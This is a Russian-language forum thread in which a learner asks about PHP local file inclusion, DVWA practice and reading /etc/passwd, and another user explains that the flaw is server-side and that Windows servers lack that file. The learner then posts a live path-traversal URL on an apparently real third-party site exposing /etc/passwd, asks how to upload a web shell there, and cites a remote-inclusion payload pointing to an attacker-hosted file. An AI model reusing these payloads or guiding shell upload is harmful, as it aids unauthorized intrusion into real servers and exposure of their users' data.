Скажите пожалуйста , если у меня стоит windows то /etc/passwd у меня не будет работать только в dvwa ? Или с windows не будет работать и в остальных тренировачных сайтах для взлома и на всех сайтах в интернете?
Заранее спасибо за ответ.
M@ZAX@KEP а как ты можешь обьяснить то что я на античате с разделе php injection зашел по уязвимой ссылке с etc/passwd и я увидел содержимое файла ?( куча надписей с логинами) Хоть у меня виндовс.
И скажи пожалуйста в уровне medium возможен file inclusion? А то у меня чето не получается , как написано в разных статьях (
а как ты можешь обьяснить то что я на античате с разделе php injection зашел по уязвимой ссылке с etc/passwd и я увидел содержимое файла ?( куча надписей с логинами) Хоть у меня виндовс.
А если серьёзно, то перечитай статью и да наступит просветление, что php-injection - серверная уязвимость. То есть то, что ты видишь, это то, что делает сервер, а не твой компьютер. Но если у тебя винда, то localhost для тебя - виндовый сервер (очевидно кагбэ), и там /etc/passwd нет и быть не может. И в dvwa его тоже не будет, ибо всё равно сервер виндовый. А по ссылке ты попал на самый обычный никсовый сервант.
Цитата:
просто при наборе etc/passwd в адресной строке можно увидеть пароли(хоть и зашифрованые) ?
Да, если присутствует уязвимость php-inj (не ограниченная open_basedir), если файл существует (его нет в BSD и win системах) и если он доступен для чтения пользователю веб-сервера.
Спасибо большое M@ZAX@KEP за толковые обяснения.
Вот та ссылка о которой я говорил : http://to-maxima.com/index.php?page=.../../etc/passwd , тут присутствует php-inj , файл существует и доступен для чтения , но где там пароли ? Там они есть или я не туда смотрю ?
Подскажите пожалуйста, есть ли варианты залить шелл? Если да, какие должны быть мои дальнейшие действия?
Не могу понять, в каком url подставлять: ?page=http://our.hosting.ru/include.txt
И что если на сайте нет страниц с параметрами?